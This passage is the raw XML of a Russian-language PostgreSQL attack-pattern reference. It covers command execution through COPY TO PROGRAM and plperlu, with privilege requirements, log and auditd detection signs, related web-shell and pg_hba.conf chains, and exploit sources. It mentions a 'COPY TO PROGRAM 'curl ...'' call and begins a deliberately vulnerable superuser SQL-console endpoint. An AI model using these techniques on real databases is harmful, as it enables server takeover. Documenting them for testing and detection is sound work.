    <w:p w14:paraId="422F7142" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до PG 10 — только superuser. С PG 11 — superuser ИЛИ predefined role </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. 2.2). Practical: роли с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> создают для backup/ETL-операторов — типичный production-setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3118C2E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не требуются, COPY встроен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF8E1B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет специальных требований. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ограничивает длительность запроса (рекомендуется), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY TO PROGRAM 'curl ...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполнится мгновенно — timeout его не остановит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF726BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Дополнительно для Payload C:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL ≤17.2 / ≤16.7 / ≤15.11 / ≤14.16 / ≤13.19 уязвимы к CVE-2025-1094 в psql-клиенте (см. 4.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7795AF31"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COPY ... TO PROGRAM 'gzip &gt; /backup/...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... FROM PROGRAM 'aws s3 cp s3://.../data.csv -'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — backup и ETL. Признаки атаки в логах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446EF44B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement = 'all'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'mod'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-роли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а не от backup-оператора (имя роли). Application-роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, выполняющая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — чёткий маркер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9EC712"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нормализованные записи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY $1 TO PROGRAM $2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с источником из веб-сессии (по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или сетевому источнику).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3947F7F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   HTTP-исходящий трафик от backend-хоста на нетипичные IP/домены — fingerprint для curl/wget/nc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1900DDCE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Команда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>popen()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от процесса postgres в audit-логах ядра (auditd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> фильтр для UID postgres → /bin/sh).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149F337" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Поведение фичи стабильно с PG 9.3. Изменения только по привилегиям: до PG 11 — superuser-only; с PG 11 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t>. Никаких фиксов «отключающих» функциональность не планируется — это by design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04547B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A29C1CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стакинг как pre-flight для большинства COPY-инъекций (Payload A и B полагаются на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в драйвере, который не блокирует multi-statement).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFCF4D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.4 lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернативный путь к RCE через web-shell или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trust + reload. Более стелс, более многошаговый.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0949E9B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2a plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернатива, требует superuser + CREATE EXTENSION. COPY PROGRAM не требует CREATE EXTENSION, поэтому быстрее.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73981D38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — получение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через цепочки (extension hijack, search_path, SECURITY DEFINER).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA5E455" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — детали CVE-2025-1094 (Payload C).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50355570" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291B8B3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/sql-copy.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B9B665" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Predefined Roles» (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t>) — https://www.postgresql.org/docs/current/predefined-roles.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97179D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   HackTricks: «PostgreSQL injection» (раздел RCE / COPY) — https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32718A1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PortSwigger SQLi cheat sheet, PostgreSQL section — https://portswigger.net/web-security/sql-injection/cheat-sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CCA7EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Greenwolf: «Authenticated arbitrary command execution on PostgreSQL» — https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52C859" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   Rapid7 Metasploit: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit/multi/postgres/postgres_copy_from_program_cmd_exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.rapid7.com/db/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DCE056" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   CVE-2019-9193 (disputed; PostgreSQL Project считает фичей) — https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C97338F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   SecureLayer7: CVE-2025-1094 chain разбор — https://blog.securelayer7.net/cve-2025-1094-postgresql-vulnerability/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA1D994" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R3 (sources/research.md)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24DA6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.7.2a plperlu untrusted (путь от superuser)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DC9BBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (untrusted PL/Perl) — серверное процедурное расширение PostgreSQL, которое разрешает функциям выполнять </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>любой</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Perl-код, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>system()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, backtick-shell-вызовы и работу с файлами. В отличие от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (trusted) — sandbox отсутствует, OS-операции не блокируются. CREATE FUNCTION в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> требует superuser-привилегии </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>именно потому</w:t>
      </w:r>
      <w:r>
        <w:t>, что это путь к OS-execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614F32BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A8CC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/admin/sql_console.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD6608A"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1D427037" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D7BEE8"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27C3845A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from app.db.session import get_superuser_session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B941C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681CEA92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385FD23C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F11108D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.post("/admin/sql/run")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB4D95F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def run_sql(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103FDC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312BCD8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_superuser_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787989A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A2363C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # SQL Console для DBA — приложение коннектится под superuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F079E1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
